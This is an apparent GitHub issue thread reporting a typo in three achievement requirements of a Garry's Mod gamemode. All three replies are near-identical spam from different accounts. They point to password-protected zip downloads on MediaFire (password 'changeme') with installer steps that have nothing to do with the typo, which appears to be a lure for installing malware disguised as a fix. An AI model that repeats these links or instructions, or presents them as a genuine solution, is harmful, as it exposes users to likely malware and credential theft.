### ISSUE TITLE
Member achievements typo

### ISSUE THREAD

**Issue by Sod-ers** [BB-Games/gamemode-issues-requests#88]
**Describe the bug**
Elder Member, Ancient Member, & Eternal Member achievements have a typo. It should be /joined not /join because the requirement is server join date, not Steam group join date.

**System Information:**
```
Protocol version 24
Exe version 2023.06.28 (garrysmod)
Exe build: 17:03:26 Jul 22 2024 (9379) (4000)
GMod version 2024.08.09, branch: x86-64, multicore: 1
Linux 64bit
```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
